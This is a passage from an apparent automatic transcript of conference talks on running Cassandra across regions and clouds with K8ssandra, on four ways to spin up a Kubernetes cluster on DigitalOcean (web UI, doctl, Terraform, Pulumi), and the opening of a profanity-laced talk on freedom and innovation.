networking geek by any means, I just wanted to make it work, right? So I had a 172.20, 172.21, 172.22 and then what I did was I installed Cassandra on 172.21 and injected the seats into 22, exactly the same thing and they formed a bigger cluster and, you know, good to go, okay? And you'll see this in action. But with the introduction of the Cassandra operator, I don't have to do any of that, right? Because it, in principle, does the same thing, right? You know, it knows the seats and essentially is able to, you know, do the gossip protocol and make it work, okay? So that's exactly what the Cassandra operator does and we'll see that in action as well, okay? So this is, I don't, basically it talks about all of these different components and what are the different contexts and so on but let's keep all that, okay? So I don't know why this came in here. I need to get rid of this. But let's go into the demo. Let me know why you're too much about this. Okay, so here's my, what I want to show is a little bit of everything, okay? So let me start actually with the EKS demo, okay? And keeping my fingers crossed, you know, live demos are always very interesting and especially when I'm connected to a network called a slow network, scale public slow. Okay, because my scale public fast did not work. So talk about, you know, anyway. All right, so let's go into my instances, okay? And, okay, so here are my instances. I have my co-pilot, my controller and all that which I'll get to in a second but we're still looking at the EKS demo where I did the manual injection of seeds myself, okay? So I'm gonna try to connect to it. Remember what this is doing? This is the bastion host, right? And I'm connecting to the bastion host, okay? That's all I'm doing, right? So let me connect to that, okay? And I'm good to go, okay? So now I am gonna do a few things, okay? So let's look at, you know, kind of the, I'm blanking out for a second here on the cube comments. So let's do get context that'll get me going. Okay, so here are the two contexts, okay? One is one, the other one is two, very, you know, rags NS fed to one and fed to two, okay? So let me set the context or use context, whatever that is, right? Is it set context, use context? I can never figure that out, okay? And just to make sure, get context, okay, that's good, okay? So now let's get the nodes. And you'll see here, this is running 172.21, okay? This is the US that I was talking about, which is basically running in Dublin or whatever the case may be, okay? Now if I do the same thing with two, you should be able to see that as 22, okay? And all of this is automatically done for me through EK's cube fed, which is really cool, right? So let's look at some pods, okay? And it doesn't really matter which cluster, okay? I can take a look at all of this, right? And you'll see here, you have the, you know, kind of like the Grafana, you have Prometheus, right? You have the Reaper operator, and you have basically all of this done using the CAS operator, right? And pretty straightforward. Then you have a bunch of CRDs and all that, which we'll take a look into in a second. You'll see here there are a number of different racks, right, rack one, rack two, and rack three, okay? And how I was able to set that up was, you know, let's take a look at EKS West, or DC West, okay? And you'll see here, I injected the seeds from the central, okay, which was the other install, right? And then what I did was I also specified the racks, and you can provide the affinity. So basically I'm saying that, you know, though one node is running on US West 1A, the other one is on 1B and the other one is on 1C, okay? So basically it's a three availability zone cluster, okay? And that's pretty much how I set this all up, okay? For those of you who are Cassandra admins, and still don't believe that this is a multi-node cluster, right, or multi-cluster Cassandra, okay? You can run something called as node tool, okay? And basically what this is saying is I'm running the, you know, basically the Cassandra container, and I'm running the node tool utility within that, okay? And I'm providing the username and password, you know, don't ever use, you know, admin and password like I do, but this is just for illustration purposes, right? So you will see here that I have a two data centers, DC1 and DC2, okay? Can everybody see that, right? And you can see here this is running on 21, okay? U stands for up, and D stands for, I mean the N stands for normal, okay? So basically what it's doing is it's up and it's normal, okay? And you'll see here that it's running on 172.21, 172.22, and if you actually do the nodes as a wide, I think this should give, no. Is it gonna get topology? I forgot, but essentially you can, if you dig through or describe, we do this, hopefully this will. So you'll see here that it's on 1B, 1A and 1C, okay? And if I do the same thing with two, right? Or with one rather, you'll see it a little bit different, right? Not a whole lot, but it's running on U West, and it's A, B, and C, okay? So it's already rack-aware, and now what we've done is we have made it region-aware as well, okay? So if something, some calamity happens on West, I can all this shift to central, and you know the drill, right? So this is as far as the EKS cube-fed experiment was concerned, right? Now I wanted to go really multi-cloud. I wanted to kind of do it on a multi-cloud, and you will see here what I've done, and this is using Lens, okay? I have three clusters here. One is on AKS, the other is on EKS, and the third one is on GKE, okay? So these three are actually used by the Kate Sandra operator, starting on AKS, you know, I just picked one, right? And essentially it installs it on EKS and GKE, okay? But to be able to do that, I used something called as aviatrix, okay? And I use this Terraform scripts, and I'll point you to this as we go, okay? So basically it's AVX, multi-cloud, Kubernetes, and what it does is it does an opinionated implementation. You just specify the names for the AWS, Azure, and GCP accounts, and it will go ahead and create the appropriate things, that need to happen. For example, if you look at, I believe it's variables.tf, you can see here, you know, the AWS Cider is 10.1, the Azure, do you want me to increase the font? Yeah, sorry about that, I forgot about that, okay? So you can see here it's 10.1, okay? Then you can see here for Azure it's 10.2, and for GCP it's 10.3, okay? And you'll see that as we dig into it. So it does all of this, it stands it up, and then of course the nice thing is you can tail it down as well, right? So I wanted something that I need to be able to do. And then, of course what I do is I, I think the readme talks about this. Essentially all that I need to do is point it to my account, to the name of the controller, okay? So what we can do is we can take a look at the controller, okay, and to go back I'll go back to EC2 instances, okay, go back to the instances, and look at the AVX controller, okay, and I'm gonna connect it, our action, open the address. Okay, not secure, that's fine, I don't care. Okay, and it'll give you an idea of, you know, what are the accounts that I've onboarded, you know, AWS, Azure, and Google, what are the gateways, and so on and so forth. So it provides you with a nice, what I want to show, here is multi-cloud transit, I think, or multi-cloud gateway, one of the two. I can never remember this. So if you look at the gateways, and if I just cider filter on 10, okay, then you'll be able to see AKS, EKS, and GKE, okay? And you'll see that AKS is on 10.2, 10.1, and 10.3, okay? It's basically an opinionated implementation, okay. So now that we've seen how I set it up with AVX, right, now what I'm gonna do is I'm gonna go into my cluster, right? So to do that, I'll just go to Lens, which is kinda cool because I don't have to do any of the cube cuddle commands, right? And here's my Azure, right? And what I'll do is I'll take a look at some of the pods, okay, and take a look at the Kate Sandra operator, and you can see here, somewhere here, it should have a control plane of true or something. I mean, a data plane is, I mean, control plane is equal to true. You can never see that when I want to. Let me, departments, let's look at that. But believe me, somewhere in there, it's there, okay? I'll let me look it over here, that's not good. But, you know, you should be able to see this. I'm sure I'll be able to see that in a second. Actually, let's look at custom resources. And you'll see here, this is the Kate Sandra cluster that was created, okay? And the name of the Kate Sandra cluster is Rags and S, okay? And you'll see here, these are the context that was injected DC GKE and DC EKS, okay? And these are the data centers that are there. So for example, if I go to EKS, let's go to EKS, right? And if I look at the pods, you should be able to see a DC. So you can see here, this is the DC that was injected, okay? So it has two, you know, here's the DC that got injected into the configurations. In fact, if I go back to the Azure, which is really where I started, right? And I can take a look at the, look at the client conflicts. You can see the two clusters being injected here, right? So here's my EKS AVX cluster and my GKE X cluster, okay? And that's kind of how I kind of made it happen. And again, I think a lot of this was already built into Cassandra, so I didn't really have to do much other than working on the networking. You know, once I got the networking going, everything was pretty straightforward to, you know, to make it happen. And now with the Kate Sandra operator, which is really about multi-cluster, multi-cloud, and so on, makes it a lot easier to be able to install on Kate Sandra, okay? So with that, I'm almost at the end of my presentation. Give you my slideshow. Let me go randomly to 30. Okay, that's good. All right, so I'm done with the demo. We saw the EKS CubeFed demo. We also saw the multi-cloud demo where I installed Anik, and actually I probably should have shown you a little bit of the command line, but I guess I'll skip it today. You know, we really don't have too much time. And with that, if you wanna head over to Kate Sandra.io, it has pretty good docs, actually. Surprisingly, for something which is pretty technical, it's pretty straightforward to install, whether you wanna install on Minikube, whether you wanna install on KIND, whether you want to install on Siebel, really anywhere, you know, you can do that. I myself wrote a blog about multi-region Cassandra on EKS, so you can take a look at that using CubeFed. You know, it essentially goes through the same demonstration that I did today. But like I said before, we also run workshops every Wednesday. You know, you're welcome to attend. I tell everybody that, you know, we're living in the golden age of developers, right? We really, you know, we have all the power, right, as a developer. So it's really up to us, yeah, exactly. You know, it's really up to us to take full advantage of this, maximize our income, whatever. But do attend this, we also provide badges. And for whatever reason, these badges are extremely popular, okay? We also have a pretty robust discussion going on in Discord. So, you know, something a little bit more permanent, you know, in the workshop, we have a lot of chatting going on, but that's primarily on YouTube. But if you want something a little bit more permanent, you know, jump onto Discord and try that out. Like I said, whole bunch of these, if you are interested in introduction to NoSQL, or if you're interested in building your own TikTok clone, or if any of you are interested in doing a Swift workshop, Swift is Apple's open source, you know, client and server-side programming, you can try all of those, okay? So, like I said, badges extremely popular, okay? So, they look cool, though, you know? So try it out, and with that, thank you very much. Great. Still have 10 minutes. Thank you very much, Rugs. I am so happy you were here. If there are, we have time for maybe one or two questions if you are able. Absolutely. Are there any questions in the room? Oh, yeah, I'll come over. Thank you for the presentation, Rugs, and for the multi-cloud, multi-region deployment. So, as the organization planning to go to production, do you have any advice to reduce costs as like if you're going to one provider to other? So, just you'd like to hear your thoughts. Yeah, yeah. I jokingly refer to this as I'm a developer advocate and I really don't concern myself about costs, which is really a bad thing to say, you know? But maybe somebody in the audience has better, you know, like guidance, especially from a cost perspective. Anybody wants to jump in and kind of provide, especially from a multi-cloud perspective, as I understand, right? Anybody wants to jump in? Otherwise, I really don't have good guidance. My apologies. No? Okay, sorry. So the question answer session didn't start very well, but really we'll keep going. Well, sounds like we have time for one more question. All right, in that case, I would like to thank you again. Thank you. Thanks for this awesome thing. We will be back in 10 minutes for the last presentation of the day, which is a little bit more beginner focused and talks about four ways to spin up a Kubernetes cluster. Hope to see you there. And as usual, it's scale. Talk to people. Everyone's friendly. That's hard. I know. I know. That's kind of it. No. That was perfect. As usual, that's kind of available. Time is weird when you're performing, when you're on stage. I saw that. Hold on. What, that works for you? Yeah. Hello, hello. Yeah. Check, check. Hello, hello. Test, test. Hello, hello. Mic, check. Test, test. Mic, number one. Check, check. Hello, mic, check. Check, check. Check, check. Mic. Check, check. Hello, mic. One, two. Check, check. Check, check. Are you guys, I was told for the last one that we can all do. Oh. Do they want to do, I mean, I can do the live. This is not a panel. This is just a single speaker. So maybe we can put it on the day. So thank you. Check, check, mic, check. Come on in, have a seat, make yourselves comfortable. We're just waiting for a little bit of AV setup before we dive into our last talk of today, Friday at scale. Yes. Hello, test. Cool. And with those final setups, yes. Thank you so much. Welcome, everyone. This is the closing talk for the Cloud Native Day this Friday at scale. I am super excited to introduce Daniel Hicks, who is going to show all of you four ways to spin up a Kubernetes cluster. We've been talking about having clusters living on our machines all day long, every single presenter. It's like, I already have a cluster. Well, here we are. This is how you get to that stage on your machine. Please welcome Daniel. Thank you. All right, hello, everybody. As she said, my name is Daniel Hicks. I am a software engineer at Digital Ocean on the storage platforms team. And this is four ways to spin up a Kubernetes cluster. Just a quick, who am I? As I mentioned, I work at Digital Ocean. I'm on the storage platforms team. We do a lot with Kubernetes on my team, hosting sort of an orchestration platform for our storage products. I graduated from West Texas A&M, go buffs. I'm also a current computer science student at Georgia Tech for my masters. And I also really enjoy open source, contributing back some of my first projects were contributing back to the .NET runtime, as well as like GitHub desktop and the external secrets operator for Kubernetes. So, jumping right in. Often, companies, we measure things, sort of your Kubernetes maturity, per se, in terms of a day one versus day two operations, where day one is sort of, you're getting your feet wet, booting up a cluster, deploying applications into it, testing things out, seeing what works, possibly automating some of that. And the more mature model would be day two, where you have sort of things like automatic logging, monitoring ingress and egress, as well as sort of backups, hardened security, things of this nature. And so we're gonna focus more on getting from day one to day two, since the process of getting from day one to day two can not only be days as in the name, but it can also take weeks, months, or sometimes even years to get there. So we're gonna talk about how to sort of speed your way or accelerate how to get there. And we're gonna do that by using things like a managed Kubernetes service, as well as picking up the best technique for your process to spin up your clusters. So, this is what we're gonna cover today. The four different ways. We're gonna go over first the web interface. Most clouds have a web interface, so we're going to specifically use digital oceans, Kubernetes interface. We're also gonna use a command line to boot up a cluster, as well as look at things like Terraform and Pulumi to boot up a cluster. And my disclaimer is everything here will be focused on digital oceans, Kubernetes platform, because it's the one I have access to. I will say, though, that every method that we're using today, or demoing today, is also available for any other cloud platform, AWS, Azure, Google Cloud, all have their own web interface and see Lies, and they also all have their own providers for Terraform and Pulumi that are openly available. So this applies for anything, not just what we're showing today. So, first off, let's do the web interface. And because I am a WIMP, I recorded my demos because you never know what can go on with live demos. And that's awesome. Speaking of, all right, so we're going to keep this small. This is just doing the UI via the web interface. You can see this is just going through and picking the various options on digital ocean. Slightly hard to see, but since it's smaller, but you can do things like choose your own cluster size, how many nodes, how big do you want the nodes to be? There's several other options such as region or if you want the high availability control plane. And so this is sort of a very quick way to do it, a very visual, you don't need to be super technical to do so if you're working on a proof of concept, it's very simple to do. And it's just a real quick way to get into it. And then from the rest of this, this is just showing it booting up, as well as how to get connected. So normally you would download something like the kube config file or something that you would put on your machine that allows you access into the cluster, as well as most cloud providers will allow some form of UI to interact with the cluster. On this one, it specifically shows just using the regular default shipped Kubernetes dashboard that would get if you say booted up Kubernetes on your home machine or something of that nature, which is what we provide at digital ocean. And then here's the dashboard that we provide from that. And this is just showing the various pods that are inside the cluster, nothing too crazy or new. Let's see if we can get the slideshow to work. All right, so the pros and cons of this sort of way of doing things. Like I mentioned, it's very fast to get started. You can boot it up right away. It's just a couple clicks of a button, nothing too fancy. It's very visual for people who like learning visually. I myself really like graphical interfaces, but that's just how I roll, how I learn, how I do things best might not be great for you. But like I said, it's very easy to spin up and down. A huge downside of this is it's hard to share this among various people. How I click the buttons or the options I choose, you only know about that from me. I can tell you how I did it and you can try to do it the same, but you might get something different. You might end up with a different configuration. And in that sense, it's very hard to repeat the same thing over and over again. Also clicking through the buttons, it takes time. So it's very hard to do over and over again, as well as like the configuration for it. Like I say, it's stuck in my head. If I go on vacation, you have no idea what I did. So there's no way to get it. And so it's just sort of stuck with the creator. It's best for prototyping something very quickly if I just need a cluster to show you something cool or to add something or just to check the install of say, I wanna check out a new operator or something of that nature. 100% perfectly fine for that. It's also good for comparing the different cloud providers. Say I wanna know what does AWS's interface look like versus Google Cloud or DigitalOcean versus Azure. It's very good for that. And you can sort of see what fits your needs the best. And it's also okay if you're willing to accept the technical debt that comes with not being able to store that configuration is something you're going to automate later or something that you're okay with up front. And so next we're gonna go over the command line. Most cloud providers provide some form of command line to interact with their services. We are no different. We provide a tool called the DO-CTL tool or DO-Cuttle tool or however you choose to pronounce that word. So here you can see I'm just loading up a interacting with our QBDND service. I'm saying I wanna create a cluster called my awesome CLI cluster minus some screen jittering. And then I want a count of three nodes. And so this does take a little bit but through the magic power of editing we'll see that this is going to speed up fairly fast and we're going to jet right to the end. And then the DO-CTL tool will also do some extra fun settings where it will actually download the Qube config onto your machine and change your current context for Qubectl to your cluster that you just created. This is usually beneficial just for getting quick access to things but then we can just run Qubectl and you can see that we have pods in all of our namespaces and things of that nature. So the pros and cons of this very similar to a UI. It's fast and easy. It's also really developer friendly. For those that like working with the terminal this is the way to go. It's also slightly possible to automate it. Bash scripts are a thing and you can very easily put this in just a file that somebody can run and boot the inputs. The downside, it's still slightly difficult to share configuration. While it is an automated script there is no state per se of what is actually up and running. Say if you have developers booting this up every time they enter the development mode there could be 10 clusters running. The command line doesn't know this. You can run, the cloud provider might provide a way to list all the clusters or they might not, depends. As well as if you're going between cloud providers or switching contexts fairly often their CLI tools are gonna be vastly different from each other. They all have different interfaces. They all provide different services. Everybody calls them differently. It's just, it won't be very consistent from provider to provider. AWS or Google Cloud all do different things than how any other cloud provider does things and so on and so forth. Since they have very similar pros their best four are very similar things such as quick prototyping, proof of concepts, understanding the cloud provider's API. So you saw where with DOCTL we did Kubernetes all of those command line arguments are almost identical to our REST API that we provide behind the scenes which is literally all this is calling. So if you need to get familiar with a cloud provider's API CLI tools are usually a very good way of doing this. And as I mentioned it's also very good for writing very basic automation. Spin up a real quick cluster by running a bash script et cetera et cetera. And so next we're gonna view a slightly more automated, consistent way of doing things. The, very nice. The first two were sort of a day one more operation where we're gonna be focusing more on day two for the next two. Yeah. All right, let's figure this out. It really hasn't. It's when your computer's working real hard. Let's find out. All right. Do not move. I'm also gonna fire up my machine. Please hold tight. All right. Oh, yeah, you're welcome. Quick poll. Who pronounces it cube cuddle? Who pronounces it cube CTL? Wow. Clear preference here. Any other pronunciations? Cube control. Cube control, right? Why didn't I not think of that? Anything else? Cube cussle. Cube cussle. Oh, yeah. Well, because sometimes you just have to cuss at your computers. That is very. That is super reasonable. Let's see. All right. Why did the robot cross the road? Why? Because it was programmed by the chicken. I learned that from my 10-year-old. How are we doing over there? Do we want a different computer? Last time it was a computer. Well, we had some issues with like a 2015 earlier. I don't. Anyway, thank you all for your patience. And see, I tried to record the demos just so I could avoid technical difficulties. Go figure. All right, so as I was saying, the first two, the web interface and the command line, they were focused more on day one, sort of model of maturity in terms of Kubernetes. So the next two, Terraform and Pulumi, they're gonna be focused more on sort of the accelerating to day two, slash day two maturity model of booting up Kubernetes clusters. So this video, let me, well, if it's too small, I can't really do much. So first off, we're just gonna cat some files, look at them. This is just showing the sort of the provider, Terraform file that you would do for a digital ocean provider in Terraform. It just mostly says what the provider is and the version that we're gonna be using. The next one is going to be, I believe the actual Kubernetes cluster that we have defined in Terraform. So you can see I'm defining a resource, which is a Kubernetes cluster that I call My Cool Cluster. I'm putting it in the region SF03, as well as declaring its name. This is the name that shows up in the UI, as well as a node pool specifying specific sizes, as well as how many I'd like. And then this is just sort of showing, for this method, you do need a digital ocean API token, which is the same thing as what you would need with the CLI, but I've already done it, so we're not gonna worry about that. Usually first, you have to run Terraform init, so there's some initial steps. This goes and downloads the provider, anything else that you might need that Terraform can configure for you. And then right from there, we run for Terraform plan. The nice thing with Terraform is it actually shows you what it's going to do, shows you what it's gonna create, the things, the state that it's gonna collect, as well as it'll tell you things that it's gonna find out after it creates the resource. So this will make an API call to digital ocean to create a cluster and return any state that it might need, such as like the private networking ID and things of that nature. And so we'll run Terraform apply. It'll ask us if this is what we truly want, and then we'll of course say yes. Again, through the power of editing, we're going to fast forward through this since provisioning Kubernetes clusters sometimes takes three to 10 minutes, depending on the options you chose, the size of it, et cetera, et cetera. So you can see us speeding through it, but this is going and getting the state behind the scenes, waiting for it to be ready, and as well as just finishing it up. So we'll skip the last couple of seconds. So once it finishes, it'll tell you that it's created a resource, and then we can just run the doctl command that we did earlier and save the kube config down to our local machine and merge it with our kube config that's local on our computer. And then just very quickly kubectl the show, I'm not fibbing. We do have a cluster up and running. We're just going to get all the pods inside all the namespaces. You can see a bunch of pods. We install Selenium or Selium by default, as well as just some DO agents that we put to monitor the cluster. So the pros and cons with this method, one of the cool pros that I think is that you can preview your infrastructure. You can put fairly complex logic in here. So sometimes what you're booting up might not always be super obvious. Running Terraform plan, you can see everything that you're going to boot up. The initial state that it's going to be that Terraform can know at that time. This also introduces the concept as infrastructure as code. Your infrastructure is no longer something that sits inside the cloud only. You can check these files in as well as the state to source control. You can also store the state out in something like S3 or digital ocean spaces if you so like digital ocean products. As well as it's very repeatable and auditable. So there are plenty of tools out there that can audit Terraform as well as monitor how much you spend in the cloud based on your Terraform state and things of that nature. So you can get fairly diverse with Terraform and monitoring things of how you go. The downside, this does require slightly more effort than just writing in a simple command into the command line. And you also have to have somewhat technical knowledge of the cloud provider that you're using. You could see that I specified specifically the slug for the size of machine that I wanted for my node pool. You have to know these things about your cloud provider if you're gonna do that. It might not always be obvious that I need to create a node pool with a Kubernetes cluster because if you're doing it via the UI, it automatically does it for you as well as the same with the command line tool. So you have to have somewhat knowledge. You have to dig through the docs slightly more and you have to go do things like go and find their provider and hope that there's good documentation on it. But this is usually best for clusters that are used by multiple people. So teams of people, this is very good because you can share the state among them. So they can all share if they go to boot up a Kubernetes cluster or say change something. Terraform, if you're using a shared state, will tell them, hey, I don't need to change anything, this already exists. If also if they need to say scale up the cluster, Terraform can tell them, hey, this is what I need to change from what exists to scale up your cluster. These are all really good for environments such as like your entire staging environment or your entire production environment. As you can, like I say, get fairly complex with Terraform and also chain different resources together and feed them into each other. So you can build sort of a very complex setup and it's also very good for disaster recovery. So say if I have an entire region go down, it's fairly trivial to say change one or two variables and boot up an entire another region in any cloud that you can think of as most of all of them have providers and can do that fairly quickly. So last, one of my favorites, Pulumi. We're going to start with a code snippet because this is the meat and bones of this. Pulumi is very much like Terraform and can actually piggyback off of Terraform as well. If there exists a Terraform provider for it, Pulumi can piggyback on it. Pulumi is more of a library for whatever coding language you would like, whether that be Python, Java, C-Sharp, Rust, Golang in this instance. You can define your infrastructure as actual code. This right here is literally just a method where I'm defining a new Kubernetes cluster the exact same way that I did in Terraform with the exact same options. With some extra fun go syntax with the ifer equals nil. If you've ever coded in go, you know exactly what that looks like. So running a real quick video, you're gonna notice that this looks very, very similar to Terraform. It is the same thing as just run up. The difference being that they store a stack and so I will actually pause it super fast to cover that. You can do things like define different stacks. So you can have like say different environments. Your staging environment could be a stack, production environment could be a stack. This is very similar to a Terraform state. This is the state of the environment and where it's at. You can store these locally or inside a Pulumi or whatever kind of backing storage Pulumi supports. So it does something very similar to Terraform but it also tells you this is what I'm going to create. Are you sure you would like to do this? You can go down and view the details. This is very similar to just Terraform's plan. So this shows you sort of what my code would go and do. And then you can just say yes, I would like to perform this update. And then this is super sped through again but this is just going through and doing the exact same thing, calling the API, requesting to create this resource and then spitting out that we're done. We also have things where we can do outputs with Kube configs in order to keep that code snippet small. We're not doing anything with the output for now but you could realistically say take the output and go put it in something like say vault, like HashiCorp vault or something of the nature to share among other developers. And so I don't know if you ever typed in front of somebody but it always seems to get 10 times more difficult. Recording demos, oddly enough, have the exact same effort. So you can see me struggling very hard to type in the command here. But, so this is just the same thing again. We're gonna go get the Kube config for my cluster just to show you I'm not fibbing. We actually went and created a cluster. Pulumi does add a small identifier to the end of your resources so you can see I had to go grab that and come back. So, and then we'll just do the same thing that we've kept doing. We're just going Kube CTL, get all pods and all namespaces. And though and behold, we're running a cluster that has only been alive for two minutes. So, what is this good for? This is infrastructure as code supercharged. It is quite literally just code. Terraform uses the HashiCorp language which looks like a derivative of JSON. While it does have logic, the logic has to be pretty basic. So, it's not something that you can boot something up if you need complex logic for looping or like say include and exclude this. You also get all of the benefits of the language you chose. As it goes, coding languages are very strong and being able to do very complex logic, whatever you can tell it to do. Pulumi takes advantage of this and you can do very complex things and they provide a mocking and integration test library for you. So, you can write things like unit tests and integration tests against your own infrastructure. So, like say I want to make sure that if I provide this CLI interface and I say I want five nodes, you can write a unit test that says when I do that, it will give me back a cluster of five nodes. This helps provide sort of confidence in your infrastructure or your infrastructure as code and sort of gives developers more confidence that what they're doing is actually, it's doing what they want it to. The downsides though, this is fairly complex. A more unusual requires an engineer, someone with technical prowess in whatever language you've chose to do what you need to do with the infrastructure. This is no longer, I need someone to just go in the UI. This is, you need in-depth knowledge of how this library works to go and use it. So, this is usually best for teams of software developers that are booting up clusters for whatever they're doing it for. And when you need something that's testable, so if you need to test your code, you need high confidence and that is a requirement for you. This is very good for that. And one of my main strong points that I like the most, if you have a certain language that your code base is in, you no longer need the context switch between it and Hashicorp language. You can make it be the exact same language that your main code base is in. The perfect example is my example was in Go. Most everything we write a digital ocean is in Go. So, I no longer have to swap between the two and it can live side by side. And it's fairly good for complex infrastructure. A good example is we were doing something that required a cross-region deployment to multiple regions and they all had to tie back together. This, it also involves serverless functions. So, this combined with serverless functions proved to be fairly complex in Terraform to where it was taking multiple days for this small little tool that is gonna be used a couple of times to boot up. We instead switched to Pulumi and could define the complex language, replace things with variables and got it up and running in like two hours. So, when you have something very complex, sometimes this makes it a lot easier rather than messing with a language that's not really meant for that sort of complex setup. So, in summary, we went over these four ways to boot up Kubernetes cluster. The first two, the web interface and command line. Very fast, simple, quick way to boot up clusters sort of focused on that day one model of maturity for Kubernetes clusters and the Terraform and Pulumi sort of the day two, we wanna automate stuff and go fast type of setup. And so this just sort of shows the, we're focusing on making that the weeks, months and years, we wanna make that a lot shorter and make it go faster. And I'd like to say thank you for coming in to the talk. Thank you for DigitalOcean for sponsoring me to come. On most everything, my name is Adusti Oldmuffin. Fun story where that came from, you can find me on GitHub and Twitter on that. And as also, if you want to, you can find me on LinkedIn as well. If you would be so kind, we have time for a few questions. I'm gonna come around with the mic. This time I'm gonna hold it though. Hey, I think you said the Terraform one, one of its pros was it's auditable. But then Pulumi is not auditable or is it also auditable? I mean, like in the sense of external and security auditors. Yeah, so the question was, is Pulumi auditable just like Terraform? In the sense of I believe that you can write tools to sort of audit it. The main reason I mentioned that Terraform is auditable is because I know that there are specifically plugins for Terraform, that that is their sole purpose of auditing sort of your infrastructure to make sure that it's hardened in terms of a security sense. Sorry, so you could include that in the Pulumi. Yes, more than likely. Okay. Yes. She works at Pulumi, so. I promise I did not slip him some cash to put Pulumi in the presentation. I had zero idea, so I promise. Questions, questions. Comments. Actually, yes. I joined a little late, so I don't know if you mentioned this, but will any of the tools set up the control plane of Kubernetes? Sorry? The control plane of Kubernetes. Is it going to, like any of the tools that you presented, any of them are going to set up the control plane or just spin up a bunch of hosts inside your Kubernetes cluster? I got you. These are all focused on sort of booting something up in sort of a cloud provider. I did talk really early that every tool I mentioned or every way I mentioned has a way in various cloud providers to do it in a very similar way. Most cloud providers will boot up, they will boot up a control plane for you, but usually will not give you access to the control plane and instead will give you access to the worker nodes. DigitalOcean does that very similar where we boot up control planes for you and we give you options for highly available. HAA control planes, but we give you the worker nodes and that's like in our model that's what we charge you for is the worker nodes. Awesome. I see a question in the back. Could you quickly put up the references slide again? Yeah, sure. Thank you. And 100% if you want this slide deck or any of the references that I have on this page, feel free to contact me as well. I'll be more than happy sending the slides. The references are Kubernetes on DigitalOcean that's just our, just links to our product page, as well as the DOCTL docs, Terraform, Pulumi docs, as well as the Kubernetes starter kit that I believe is provided by the CNCF. I don't remember the name of it now, but wasn't there a project in Kubernetes to have like a cluster API or something where you could, do you know what I'm talking about? Yes. What happened to that? Is that still happening? So are you talking about cross plane? No. Okay. I believe there are multiple tools. This was originally, there was another one which was called cross plane. They provide something very similar where you can boot up resources as Kubernetes resources and it will spin them up in the various clouds as you needed. It's very similar. Too many technical issues coming into this talk since I was last minute sort of prepping for this. So I went with Pulumi instead but there are other ways as well. So as far as I remember cluster API was a sub-project of the Kubernetes project. So I would go start there. Could you briefly talk about the difference between the state in Terraform and the state how Pulumi handles the state real quickly? Sure. And I think she can probably cover, might be able to cover more in-depth on the state in Pulumi. The Terraform state is generally more, usually what I would describe is just a JSON file and it stores sort of the state of like what is, everything that you see with Terraform plan is exactly what's gonna be in that state file. You can just specify different things in Terraform to spit it out to like say S3 to where it can be shared or you can do it locally. And I don't know if it's best practice to check it in a source control but you can check it in a source control. Pulumi does things in sort of stacks and so the stacks is just a very similar concept. They just sort of expose it via their tool a lot better as well as they will natively send it to their SaaS product. I do things locally instead. That's pretty much the wrap up. I mean the Pulumi state is a big JSON file. Yeah. The question was in Pulumi, can you keep the state locally and I would have to get back to you on that because I work there so I get a free account. I can actually answer that and say yes you can. That's what I did for this demo. Yeah, I didn't feel like pushing it so you can configure it to just push locally. No problem. So I see people are bringing in chairs and drinks and all this sort of thing so I will thank Daniel once more. Thank you so much. Thanks everyone for being here. What an awesome, awesome day and I hope to see everyone at upscale. All right. Have a great conference. See you around. Yeah, okay. Good evening, scale. Are we, are we ready? Let's do this. Okay. So our first speaker tonight is Seamus Blatley. He's going to talk about the independence of the importance of independence. Seamus needs no introduction to those of us that follow him on Twitter. He's lived more lifetimes than all of us can combined imagine. He's worked on some game development, some physics on games. He's worked on some advanced math, some baking. He said there would be bagels but there aren't any. So I'm disappointed about that. And I also had him come here yesterday just to do a full on dress rehearsal to an empty room. I think he enjoyed that. But anyway, without further ado, Seamus Blatley, guys. All right, let's do this. Hey, everybody have enough drinks? The most important thing when you hear me talk is that you have enough drinks. All right, everybody drink up. Then you're not going to enjoy this. I'm sorry. But try to get into an altered state anyway. I might end up putting you in an altered state called boredom. Today, we are going to talk about innovation and freedom. Freedom is something I think very important to this crowd and to free software, which is the thing that's been geared on my heart my entire career. I am Seamus Blatley and today's date, although Bala told me otherwise, is not 728. It is 729. Yesterday when I came here, this was my talk. It was less stressful. It was a perfect presentation. We're going to have a less perfect presentation today, probably much worse, about freedom, tinkering, and innovation. These are, I mean, this is the center of my life. So hopefully I'm not bore you too bad. I have some housekeeping to get out of the way first on this. I fucking hate slides. There are not going to be slides for this presentation. Here is the main slide for this presentation, the subtle absence of slides. All right, so listen. Here's the deal. Almost everybody in this room, including me, is in the business of making something from nothing. And probably most of us, our entire careers, have been in a weird situation when you go out to an event or you meet your sister's new boyfriend or your parents' friends come over and they want to know what you do. And they are never going to understand what you do. It's just not going to happen. It doesn't matter if it's security, encryption, whatever it is, they're never going to fucking understand. And they may deride you for it as well, which is awesome, because you have some dude who works in a bank and he's telling you you're an idiot and you're like, yeah, okay, cool. I have this thing called cryptocurrency. It might fuck your job up. Just pay attention. So, anyway, the thing about it is that what we have been doing this whole time is creating value from vacuum. Some refer to this as pulling it out of your ass. It's similar. And yeah, it's right, it's the spirit that matters. And a lot of people can't understand this and it's specifically strange because guys from my generation and old guys, you know who you are, we come from a world where everybody was a banker, everybody was in real estate. All the cool kids were making money and manufacturing. And in those worlds, you are playing a zero sum game. Some guy minds the minerals that the other people can't get to and he wins over them. Somebody sells a property for more money than the other guy or sees some kind of tax benefit better than the other guy and he wins. The other guy loses. And the thing that these people do not understand about what it is that most of us in this room do is that we're not playing a zero sum game. We're playing a game where there's nothing. And then you work really hard and if you can stay sane and pay for food, after that, there is something of value that gets sold to somebody and your sister's boyfriend is super confused about why you have a nicer house than him. Okay. And then to add incredible befuddlement to these people, you start to talk at Thanksgiving about the fact that the software that you write, you are giving away to other people for free. And then they're really fucked up. They really don't understand what you're talking about. But it's interesting because the free business model has been around for all of human civilization. I am sure the first drug dealer gave some free samples. Kickstarted his business that way. But we do, most people do work for free all the time. They just don't notice it. And what I want to talk about tonight with respect to freedom, creativity, innovation, tinkering, all these things is that it's that free part, the part when you're playing around, the part when nothing's on the line, when you're not playing with $100 million investment or you're not like driving a super expensive truck. It's that moment where you're actually gonna create something new because you're free and you're not worried about shit, right? You're not concerned about anything. And by the way, I know plenty of programmers who are just fucking psychopaths and they never worry about anything anyway and they're awesome, because it doesn't matter if they're doing it. But for most people, that moment where you're free is the moment where you achieve this maximum creativity, okay? And that's the magic moment. That's the moment that the old world didn't understand. And the trick is, how do you get yourself into that space often and aggressively? How do you manufacture a situation where the largest number of people at your company are in this creative space, for instance? Generating revenue from nothing. A giant anal extraction factory. You have to do this to succeed. And the answer is, you try to put them all into this place where they're playing, where they're just screwing around. Better, better, even better, where they're playing and showing off to their friends, okay, where 